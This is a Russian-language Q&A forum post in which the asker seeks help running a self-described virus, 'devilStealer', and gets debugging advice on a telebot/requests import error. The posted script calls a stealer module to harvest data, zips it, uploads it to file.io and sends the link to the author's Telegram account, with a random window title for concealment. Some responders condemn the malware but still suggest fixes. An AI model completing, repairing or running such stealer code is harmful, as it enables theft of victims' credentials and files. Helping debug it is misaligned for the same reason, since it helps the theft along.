# Python Вирус не запускается, выдаёт ошибку в библиотеке telebot, абсолютно всё установил даже много разных версий перепробовал!

Tags: python, telebot

Всем здравствуйте, я пишу скрипт на python и он при запуске выдаёт ошибку в модуле telebot, вот всё что было в терминале:

```
PS C:\Users\Компутер\Desktop\Новая папка (3)\devilStealer-Builder> & C:/Users/ 
Компутер/AppData/Local/Programs/Python/Python312/python.exe "c:/Users/Компутер/Desktop/ 
Новая папка (3)/devilStealer-Builder/devilStealer/bot.py"
Traceback (most recent call last):
File "c:\Users\Компутер\Desktop\Новая папка (3)\devilStealer- 
Builder\devilStealer\bot.py", line 2, in <module>
import telebot
File "C:\Users\Компутер\AppData\Local\Programs\Python\Python312\Lib\site- 
packages\telebot\__init__.py", line 40, in <module>
from telebot import apihelper, util, types
File "C:\Users\Компутер\AppData\Local\Programs\Python\Python312\Lib\site- 
packages\telebot\apihelper.py", line 10, in <module>        
import requests
File "C:\Users\Компутер\AppData\Local\Programs\Python\Python312\Lib\site- 
packages\requests\__init__.py", line 58, in <module>        
from . import utils
File "C:\Users\Компутер\AppData\Local\Programs\Python\Python312\Lib\site- 
packages\requests\utils.py", line 26, in <module>
from .compat import parse_http_list as _parse_list_header
File "C:\Users\Компутер\AppData\Local\Programs\Python\Python312\Lib\site- 
packages\requests\compat.py", line 7, in <module>
from .packages import chardet
File "C:\Users\Компутер\AppData\Local\Programs\Python\Python312\Lib\site- 
packages\requests\packages\__init__.py", line 3, in <module>
from . import urllib3
File "C:\Users\Компутер\AppData\Local\Programs\Python\Python312\Lib\site- 
packages\requests\packages\urllib3\__init__.py", line 10, in <module>
from .connectionpool import (
File "C:\Users\Компутер\AppData\Local\Programs\Python\Python312\Lib\site- 
packages\requests\packages\urllib3\connectionpool.py", line 38, in <module>
from .response import HTTPResponse
File "C:\Users\Компутер\AppData\Local\Programs\Python\Python312\Lib\site- 
packages\requests\packages\urllib3\response.py", line 9, in <module>
from ._collections import HTTPHeaderDict
File "C:\Users\Компутер\AppData\Local\Programs\Python\Python312\Lib\site- 
packages\requests\packages\urllib3\_collections.py", line 1, in <module>
from collections import Mapping, MutableMapping
ImportError: cannot import name 'Mapping' from 'collections' 
(C:\Users\Компутер\AppData\Local\Programs\Python\Python312\Lib\collections\__init__.py)
PS C:\Users\Компутер\Desktop\Новая папка (3)\devilStealer-Builder>
```

Это то что было в терминале при попытке запуска.

Вот сам код скрипта:

```
import os
import telebot
import requests
import stealer
from telebot import types
import string
import random

ADMIN_ID = "*****" # Мой айди телеграм
FILE_IO_API_URL = "https://file.io"

bot = telebot.TeleBot("**********") #телеграмм токен

rand_title = ''.join(random.choice(string.ascii_lowercase) for i in range(10))
os.system(f"title {rand_title}")

def upload_to_fileio(archive_path):
    with open(archive_path, "rb") as file:
    response = requests.post(FILE_IO_API_URL, files={"file": file})
    response_data = response.json()
    file.close()
    return response_data.get("link")

def send_to_tg(archive_path):
    file_io_link = upload_to_fileio(archive_path)
    lnkkb = types.InlineKeyboardMarkup()
    btn = types.InlineKeyboardButton(text=" Скачать логи", url=file_io_link)
    lnkkb.add(btn)
    bot.send_message(ADMIN_ID, "DevilStealer>>> ЕБОЙ КТО-ТО ПОПАЛСЯ, СЕТЕВОЙ И ТАК ДАЛЕЕ 
У ТЕБЯ!!!!", reply_markup=lnkkb)


def main():
    stealer.steal_all()
    arch = stealer.create_zip_archive()
    if arch:
        send_to_tg(stealer.ZIP_PATH)
        stealer.delFolder()
        bot.stop_polling()
        exit(0)

if __name__ == "__main__":
    main()
    bot.polling(none_stop=True)
```

Если что есть и второй скрипт но он сюда не уместится. (Там более 500 строк кода)
Помогите пожалуйста!

Comment: Если вы хотите приносить вред другим, вы должны бы для начала быть на голову выше этих самых других технически.

Answer (score 0):

Как я понимаю: Вы пытаетесь импортировать библеотеку, в этой библеотеке тоже пытаються что-то импортировать, а конкретно из файла collections пытаеться ипортировать Mapping. Но этого Mapping Просто не существует(Он не может его найти). В этом и вся ошибка

Comment: Спасибо но при попытке его установить

У меня выходит ошибка  Building wheel for qdldl (pyproject.toml): finished with status 'error'

Answer (score 0):

Конечно крайне осуждаю данный "Вирус"

Но скорее всего неполадка под "Капотом" Библиотеки что-то не так есть 3 выхода:

1.Использовать другую библиотеку

2.Сменить версию Python (Да это тоже может повлиять)

3.Попробуй переустановить модуль requests